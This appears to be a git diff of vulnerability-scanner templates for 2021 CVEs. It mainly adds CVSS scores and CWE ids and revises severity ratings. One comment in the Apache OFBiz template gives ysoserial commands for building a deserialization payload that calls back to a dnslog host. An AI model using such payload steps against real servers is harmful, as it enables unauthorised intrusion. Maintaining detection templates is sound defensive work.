@@ -3,13 +3,18 @@ id: CVE-2021-24340 info: name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection author: lotusdll - severity: critical + severity: high description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability. reference: - https://www.exploit-db.com/exploits/49894 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ - https://github.com/Udyz/WP-Statistics-BlindSQL tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-24340 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2021/CVE-2021-24387.yaml b/cves/2021/CVE-2021-24387.yaml index fa60b34342..8d0e643b50 100644 --- a/cves/2021/CVE-2021-24387.yaml +++ b/cves/2021/CVE-2021-24387.yaml @@ -10,6 +10,11 @@ info: severity: medium tags: cve,cve2021,xss,wordpress reference: https://cxsecurity.com/issue/WLB-2021070041 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24387 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2021/CVE-2021-24389.yaml b/cves/2021/CVE-2021-24389.yaml index 3b6b1bb833..024f7e7b87 100644 --- a/cves/2021/CVE-2021-24389.yaml +++ b/cves/2021/CVE-2021-24389.yaml @@ -7,6 +7,11 @@ info: description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability. reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389 tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24389 + cwe-id: CWE-79 requests: - method: GET 
diff --git a/cves/2021/CVE-2021-24406.yaml b/cves/2021/CVE-2021-24406.yaml index 5ef2b21f2c..5663561a64 100644 --- a/cves/2021/CVE-2021-24406.yaml +++ b/cves/2021/CVE-2021-24406.yaml @@ -5,8 +5,13 @@ info: author: 0x_Akoko description: The plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login. reference: https://wpscan.com/vulnerability/a9284931-555b-4c96-86a3-09e1040b0388 - severity: low + severity: medium tags: wordpress,redirect,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24406 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-24472.yaml b/cves/2021/CVE-2021-24472.yaml index b45ea11b81..634ca3ad27 100644 --- a/cves/2021/CVE-2021-24472.yaml +++ b/cves/2021/CVE-2021-24472.yaml @@ -4,9 +4,14 @@ info: author: Suman_Kar name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website. - severity: high + severity: critical reference: https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a tags: cve,cve2021,wordpress,lfi,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-24472 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-24495.yaml b/cves/2021/CVE-2021-24495.yaml index 4a5b9a1610..19e4bf5b0d 100644 --- a/cves/2021/CVE-2021-24495.yaml +++ b/cves/2021/CVE-2021-24495.yaml 
@@ -9,6 +9,11 @@ info: reference: - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - https://wordpress.org/plugins/marmoset-viewer/#developers + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24495 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24498.yaml b/cves/2021/CVE-2021-24498.yaml index 64eccc35f9..249ee3cb41 100644 --- a/cves/2021/CVE-2021-24498.yaml +++ b/cves/2021/CVE-2021-24498.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: cve,cve2021,xss,wordpress,wp-plugin reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24498 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2021/CVE-2021-25281.yaml b/cves/2021/CVE-2021-25281.yaml index 9b24744f57..3636534b7b 100644 --- a/cves/2021/CVE-2021-25281.yaml +++ b/cves/2021/CVE-2021-25281.yaml @@ -7,6 +7,11 @@ info: reference: http://hackdig.com/02/hack-283902.htm description: The SaltAPI does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master. tags: cve,cve2021,saltapi,rce,saltstack + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-25281 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index ca62a13683..6c596f1aad 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml 
@@ -3,12 +3,17 @@ id: CVE-2021-25646 info: name: Apache Druid RCE author: pikpikcu - severity: critical + severity: high reference: https://paper.seebug.org/1476/ description: | Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. tags: cve,cve2021,apache,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-25646 + cwe-id: CWE-732 requests: - raw: diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index 54134b92e1..223055583e 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -11,6 +11,11 @@ info: - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084 - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 - https://github.com/Udyz/CVE-2021-26084 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26084 + cwe-id: CWE-74 requests: - raw: diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml index d0462007ca..b1cf4c5442 100644 --- a/cves/2021/CVE-2021-26086.yaml +++ b/cves/2021/CVE-2021-26086.yaml @@ -9,6 +9,11 @@ info: - https://jira.atlassian.com/browse/JRASERVER-72695 - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 tags: cve,cve2021,jira,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-26086 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index cef67180f6..ab08b76304 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml 
@@ -13,6 +13,11 @@ info: # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # `cat mad.ot | hex` and replace in along with the url in std-String value + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26295 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2021/CVE-2021-26475.yaml b/cves/2021/CVE-2021-26475.yaml index bc9d4332f5..197a0e35f5 100644 --- a/cves/2021/CVE-2021-26475.yaml +++ b/cves/2021/CVE-2021-26475.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf severity: medium tags: cve,cve2021,xss,eprints + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26475 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26710.yaml b/cves/2021/CVE-2021-26710.yaml index ed5fc3662d..df2e680cab 100644 --- a/cves/2021/CVE-2021-26710.yaml +++ b/cves/2021/CVE-2021-26710.yaml @@ -7,6 +7,11 @@ info: description: A cross-site scripting (XSS) issue in the login panel in Redwood Report2Web 4.3.4.5 and 4.5.3 allows remote attackers to inject JavaScript via the signIn.do urll parameter. reference: https://vict0ni.me/report2web-xss-frame-injection.html tags: cve,cve2021,redwood,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26710 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26722.yaml b/cves/2021/CVE-2021-26722.yaml index 3b867adacd..72c53cc241 100644 --- a/cves/2021/CVE-2021-26722.yaml +++ b/cves/2021/CVE-2021-26722.yaml 
@@ -7,6 +7,11 @@ info: description: LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the "No results found for" message in the search bar. reference: https://github.com/linkedin/oncall/issues/341 tags: cve,cve2021,linkedin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26722 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26723.yaml b/cves/2021/CVE-2021-26723.yaml index 7358094f07..8372fc51ee 100644 --- a/cves/2021/CVE-2021-26723.yaml +++ b/cves/2021/CVE-2021-26723.yaml @@ -11,6 +11,11 @@ info: - https://jenzabar.com/blog - https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328 tags: cve,cve2021,jenzabar,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26723 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26812.yaml b/cves/2021/CVE-2021-26812.yaml index 032841467b..e8d74a17dc 100644 --- a/cves/2021/CVE-2021-26812.yaml +++ b/cves/2021/CVE-2021-26812.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/udima-university/moodle-mod_jitsi/issues/67 - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26812 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index 2b7a25ea5d..f2b5e87856 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml 
@@ -12,6 +12,10 @@ info: - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26855 requests: - raw: diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml index 0f16811c2a..5718543b60 100644 --- a/cves/2021/CVE-2021-27132.yaml +++ b/cves/2021/CVE-2021-27132.yaml @@ -3,9 +3,17 @@ id: CVE-2021-27132 info: name: CRLF Injection - Sercomm VD625 author: geeknik - severity: medium + severity: critical description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 tags: cve,cve2021,crlf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27132 + cwe-id: CWE-74 + reference: + - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 + - http://sercomm.com requests: - method: GET diff --git a/cves/2021/CVE-2021-27330.yaml b/cves/2021/CVE-2021-27330.yaml index b356cf909a..4f26fcca3a 100644 --- a/cves/2021/CVE-2021-27330.yaml +++ b/cves/2021/CVE-2021-27330.yaml @@ -7,6 +7,11 @@ info: description: Triconsole Datepicker Calendar <3.77 is affected by cross-site scripting (XSS) in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents. reference: https://www.exploit-db.com/exploits/49597 tags: cve,cve2021,triconsole,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-27330 + cwe-id: CWE-79 requests: - method: GET 
diff --git a/cves/2021/CVE-2021-27651.yaml b/cves/2021/CVE-2021-27651.yaml index 0b53b90095..0bd9968499 100644 --- a/cves/2021/CVE-2021-27651.yaml +++ b/cves/2021/CVE-2021-27651.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-27651 severity: critical tags: cve,cve2021,pega,auth-bypass + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27651 + cwe-id: CWE-287,CWE-640 requests: - method: GET diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml index cba085815d..44b1b651c3 100644 --- a/cves/2021/CVE-2021-27850.yaml +++ b/cves/2021/CVE-2021-27850.yaml @@ -9,6 +9,11 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-27850 tags: cve,cve2021,apache,tapestry + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27850 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml index b14c3ad7df..7d28fe62e8 100644 --- a/cves/2021/CVE-2021-27905.yaml +++ b/cves/2021/CVE-2021-27905.yaml @@ -3,7 +3,7 @@ id: CVE-2021-27905 info: name: Apache Solr <= 8.8.1 SSRF author: hackergautam - severity: medium + severity: critical tags: cve,cve2021,apache,solr,ssrf description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2. reference: 
@@ -11,6 +11,11 @@ info: - https://ubuntu.com/security/CVE-2021-27905 - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27905 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml index 33dd3f51b9..5529e9a825 100644 --- a/cves/2021/CVE-2021-28149.yaml +++ b/cves/2021/CVE-2021-28149.yaml @@ -10,6 +10,11 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 tags: cve,cve2021,hongdian,traversal + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-28149 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml index b16d0b19a0..0970614363 100644 --- a/cves/2021/CVE-2021-28150.yaml +++ b/cves/2021/CVE-2021-28150.yaml @@ -9,6 +9,11 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 tags: cve,cve2021,hongdian,exposure + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.50 + cve-id: CVE-2021-28150 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml index 34b2b86083..60ffa8230b 100644 --- a/cves/2021/CVE-2021-28151.yaml +++ b/cves/2021/CVE-2021-28151.yaml @@ -10,6 +10,11 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28151 tags: cve,cve2021,hongdian,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-28151 + cwe-id: CWE-78 requests: - raw: 
diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml index 40408c866b..35d226536b 100644 --- a/cves/2021/CVE-2021-28164.yaml +++ b/cves/2021/CVE-2021-28164.yaml @@ -10,6 +10,11 @@ info: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty tags: cve,cve2021,jetty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-28164 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml index e88a103bc6..2c4b5ba010 100644 --- a/cves/2021/CVE-2021-28169.yaml +++ b/cves/2021/CVE-2021-28169.yaml @@ -10,6 +10,11 @@ info: description: | For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory. tags: cve,cve2021,jetty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-28169 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index d591e23f66..ae168da091 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -10,6 +10,11 @@ info: - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 - https://github.com/advisories/GHSA-pch5-whg9-qr2r + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2021-28918 + cwe-id: CWE-20 requests: - method: GET diff --git a/cves/2021/CVE-2021-28937.yaml b/cves/2021/CVE-2021-28937.yaml index 30132099ca..7c00cd061c 100644 --- a/cves/2021/CVE-2021-28937.yaml +++ b/cves/2021/CVE-2021-28937.yaml 
@@ -5,8 +5,13 @@ info: author: geeknik description: The password.html page of the Web management interface of the Acexy Wireless-N WiFi Repeater REV 1.0 contains the administrator account password in plaintext. reference: https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990 - severity: medium + severity: high tags: cve,cve2021,acexy,disclosure,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-28937 + cwe-id: CWE-312 requests: - method: GET diff --git a/cves/2021/CVE-2021-29156.yaml b/cves/2021/CVE-2021-29156.yaml index b92aededf1..976a0d7a51 100644 --- a/cves/2021/CVE-2021-29156.yaml +++ b/cves/2021/CVE-2021-29156.yaml @@ -7,6 +7,11 @@ info: tags: cve,cve2021,openam description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email. reference: https://blog.cybercastle.io/ldap-injection-in-openam/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-29156 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml index 46e6805abe..4a1d38914d 100644 --- a/cves/2021/CVE-2021-29203.yaml +++ b/cves/2021/CVE-2021-29203.yaml @@ -8,6 +8,11 @@ info: reference: - https://www.tenable.com/security/research/tra-2021-15 - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-29203 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-29441.yaml b/cves/2021/CVE-2021-29441.yaml index ac947cde4f..87203f1c21 100644 --- a/cves/2021/CVE-2021-29441.yaml +++ b/cves/2021/CVE-2021-29441.yaml 
@@ -11,9 +11,14 @@ info: This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server. author: dwisiswant0 - severity: high + severity: critical reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ tags: nacos,auth-bypass,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-29441 + cwe-id: CWE-290 requests: - raw: diff --git a/cves/2021/CVE-2021-29442.yaml b/cves/2021/CVE-2021-29442.yaml index 81a6d3fc5d..7b61103f73 100644 --- a/cves/2021/CVE-2021-29442.yaml +++ b/cves/2021/CVE-2021-29442.yaml @@ -10,6 +10,11 @@ info: severity: high reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ tags: nacos,auth-bypass,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-29442 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml index 51791de0f0..c76ead0c70 100644 --- a/cves/2021/CVE-2021-29484.yaml +++ b/cves/2021/CVE-2021-29484.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-29484 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-29622.yaml b/cves/2021/CVE-2021-29622.yaml index ff5a0b4b8a..95b34e9478 100644 --- a/cves/2021/CVE-2021-29622.yaml +++ b/cves/2021/CVE-2021-29622.yaml 
@@ -7,6 +7,11 @@ info: reference: https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 severity: medium tags: cve,cve2021,prometheus,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-29622 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-29625.yaml b/cves/2021/CVE-2021-29625.yaml index 26175c05d3..d5e3bd655d 100644 --- a/cves/2021/CVE-2021-29625.yaml +++ b/cves/2021/CVE-2021-29625.yaml @@ -9,6 +9,11 @@ info: - https://sourceforge.net/p/adminer/bugs-and-features/797/ - https://www.cvedetails.com/cve/CVE-2021-29625/ tags: cve,cve2021,adminer,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-29625 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 5b47b94607..c1251e9592 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -3,12 +3,17 @@ id: CVE-2021-30151 info: name: CVE-2021-30151 author: DhiyaneshDk - severity: low + severity: medium description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. reference: - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 tags: cve,cve2021,xss,sidekiq + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-30151 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-3017.yaml b/cves/2021/CVE-2021-3017.yaml index 0168388bab..5a60c6d460 100644 --- a/cves/2021/CVE-2021-3017.yaml +++ b/cves/2021/CVE-2021-3017.yaml 
@@ -9,6 +9,10 @@ info: - https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 tags: cve,cve2021,exposure,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3017 requests: - method: GET diff --git a/cves/2021/CVE-2021-3019.yaml b/cves/2021/CVE-2021-3019.yaml index 67895708da..c642949eea 100644 --- a/cves/2021/CVE-2021-3019.yaml +++ b/cves/2021/CVE-2021-3019.yaml @@ -3,12 +3,17 @@ id: CVE-2021-3019 info: name: Lanproxy Directory Traversal author: pikpikcu - severity: medium + severity: high description: ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet. reference: - https://github.com/ffay/lanproxy/commits/master - https://github.com/maybe-why-not/lanproxy/issues/1 tags: cve,cve2021,lanproxy,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3019 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-30461.yaml b/cves/2021/CVE-2021-30461.yaml index 6de9e167ab..a5bbb3a5a1 100644 --- a/cves/2021/CVE-2021-30461.yaml +++ b/cves/2021/CVE-2021-30461.yaml @@ -7,6 +7,11 @@ info: description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor. tags: cve,cve2021,rce,voipmonitor reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-30461 + cwe-id: CWE-94 requests: - raw: diff --git a/cves/2021/CVE-2021-31249.yaml b/cves/2021/CVE-2021-31249.yaml index 64112f9e82..f25315a536 100644 
